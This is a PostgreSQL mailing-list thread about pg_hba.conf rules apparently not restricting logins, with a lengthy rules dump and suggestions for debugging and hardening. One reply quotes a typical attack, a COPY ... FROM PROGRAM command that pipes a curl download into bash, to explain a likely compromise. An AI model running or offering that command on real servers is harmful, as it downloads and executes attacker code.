Обсуждение: Re: How to confirm the pg_hba.conf service is correctly working
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?
DEAR
I have tested this feature , only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file
Have checked select * from pg_hba_file_rules results are consistent with pg_hba.conf
any ip and user still can login in db
When I remove pg software and reinstall pg software , the function of pg_hba is working ,represent that the location and content of pg_hba.conf are correct
Suspect that the function of pg_hba is destroyed?
Dave Cramer <davecramer@postgres.rocks> 於 2021年12月22日 週三 下午6:58寫道:
On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:Dear DaveThe result after reload is
2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""
No other error message
------------------------------------------result of select * from pg_hba_file_rules
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,Hmmm for some reason I did not reply to the list.At any rate.Your original post stated that you only hadin the pg_hba.conf file.However the result of the select is considerably more ?Dave Cramer
> Have checked select * from pg_hba_file_rules results are consistent with pg_hba.conf
> any ip and user still can login in db
> any ip and user still can login in db
Any proxy? port/ip - forwarding running in the background?
in the next time check the "client_addr".
- SELECT usename, client_addr FROM pg_stat_activity where client_addr is not null ;
> a Postgres DB that was Hacked l
> When I remove pg software and reinstall pg software
I agree with others;
- please re-install the full system! ( not just the PostgreSQL! )
Usually, the attack sequence:
- open port, brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.
> host VJ VJ_USER 10.10.10.1/32 md5
imho:
- use different ports
- change "md5" to "scram-sha-256"
- maybe: add https://www.postgresql.org/docs/10/auth-delay.html
- for administrating use SSH tunnels: https://www.postgresql.org/docs/10/ssh-tunnels.html ( and use a firewall - for closing all external ports or use SSL )
Regards,
Imre
shing dong <s7eqs7eq@gmail.com> ezt írta (időpont: 2021. dec. 23., Cs, 11:15):
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?DEARI have tested this feature , only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf fileHave checked select * from pg_hba_file_rules results are consistent with pg_hba.confany ip and user still can login in dbWhen I remove pg software and reinstall pg software , the function of pg_hba is working ,represent that the location and content of pg_hba.conf are correctSuspect that the function of pg_hba is destroyed?Dave Cramer <davecramer@postgres.rocks> 於 2021年12月22日 週三 下午6:58寫道:On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:Dear DaveThe result after reload is
2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""
No other error message
------------------------------------------result of select * from pg_hba_file_rules
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,Hmmm for some reason I did not reply to the list.At any rate.Your original post stated that you only hadin the pg_hba.conf file.However the result of the select is considerably more ?Dave Cramer
On Thu, 23 Dec 2021 at 15:45, shing dong <s7eqs7eq@gmail.com> wrote:
I may be a bit off , but can you try a couple of things, other than a fresh install, incase you have time to debug more.
is it possible to snapshot the vm, and and set it up in a controlled environment where you can play around with incoming connections at the network layer
beyond the vm.
With that, is it possible for you to use gdb and debug a connection to the postmaster.
you can setup using below,
and then you can put a breakpoint at this function and check the input lines it gets for parsing.
but maybe this helps identify why other ips are being allowed.
to be more paranoid, you can all reject from the ip you are trying to make a connection, and trace that specific rule.
this might be an overkill and maybe a waste of effort given you already can query the hba view, but incase you want to try out.